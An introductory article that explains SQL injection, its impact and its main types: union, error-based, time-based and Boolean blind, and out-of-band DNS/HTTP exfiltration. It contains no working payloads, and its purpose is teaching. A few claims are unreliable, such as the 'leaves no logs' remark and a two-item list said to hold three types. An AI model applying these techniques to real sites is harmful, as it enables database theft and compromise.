What is SQL injection, and what are the types of SQL injection? These are the common questions, and we will seek the answer to all these questions in this article.
What is SQL Injection:
SQL Injection is considered as one of the significant threats for web applications and currently listed as the number one vulnerability in the list of OWASP Top 10 (2020). SQL Injection happens when the user input that is interacting with the database is not sanitized correctly. An attacker can exploit this vulnerability to retrieve information from a database such as user credentials and other sensitive information.
Impact of SQL Injection:
The impact of a successful SQL Injection attack is enormous. By exploiting SQL injection, an attacker can update or even delete the entire database from the webserver. In such cases, its impact is the same as Denial of service attack (DoS). Some of the outcomes of SQL Injection are as follows:
- An attacker can get remote code execution and compromise the entire web server.
- An attacker can update or delete the database.
- An attacker can retrieve sensitive information such as credit card information, user credentials, and other personally identifiable information.
- An attacker can deface a website to cause reputation loss.
- Bypass login pages to gain access to the website users.
Types of SQL Injection:
There are three common types of SQL Injection, which can be further classified into more categories. These three types are
- Out of Band
- Blind SQL injection
In-Band SQL Injection:
In-Band SQL Injection is the most common type of SQL Injection. It is also the easiest to exploit out of all kinds of SQL injection. In this type, the attacker uses the same communication channel for both attack and retrieve Database results. Hence, the attacker does not have to depend on any external factors. It is further divided into two types, namely Union based and error based SQL Injection.
- Union-based SQL Injection:
The Union based SQL Injection leverages UNION operator in SQL Query to retrieve Database information. The methodology behind Union based SQL Injection is quite simple. It simply combines the result of two or more select statements into a single outcome and then displays the result as an HTTP response.
- Error based SQL Injection:
In error-based SQL Injection, the attacker relies on error messages to identify the SQL Injection vulnerability. Once the error message related to the database is shown, the attacker can leverage error messages to understand the syntax of SQL Query and then exploit it to retrieve information such as Database name, Table names, Column names, and raw data.
Blind SQL Injection:
Blind SQL Injection occurs when the attacker is unable to find error messages on the website, but the SQL injection vulnerability still exists on the website. Developers usually hide error messages as the prevention of SQL Injection. However, in many cases, it is still present. The attacker can take advantage of time delays and Boolean based responses to identify and exploit SQL Injection. Manual exploitation of Blind SQL Injection takes a lot of time. However, automation can help extract the entire database quickly once the correct syntax of the SQL query is identified.
- Time-based Blind SQLi:
The attacker can take advantage of SQL functions such as sleep(time), Benchmark(count, expr), and WAIT FOR DELAY “hh:mm:ss” to identify the SQL Injection vulnerability. What attacker does is that it injects SQL statements to determine the delay in response and extract Database information based upon the delay. The advantage of using time-based Blind SQLi is that it leaves no logs in.
- Boolean based Blind SQLi:
In Boolean based Blind SQLi, the attacker guesses the Database information by interpreting the response. It relies on SQL query, which return the result as True or False, and based upon that proceed further to retrieve all the information about the database. This process is prolonged as the Attacker need to execute lots of SQL statements to retrieve complete details.
Out of Band SQL Injection:
This category of SQL Injection is not very common as it relies on external factors such as features enabled on the database server used by the web application. It is always considered as the second path to attack after the In-Band, and Blind SQL Injection are not exploitable by the attacker.
Out of Band SQL Injection relies on factors such as the database server’s ability to make DNS or HTTP requests. Common examples of Out of Band exploitation are DNS based exfiltration and HTTP based exfiltration.
This article covers the basic but most important concept of SQL injection; we will cover the exploitation techniques of each type in the next sections.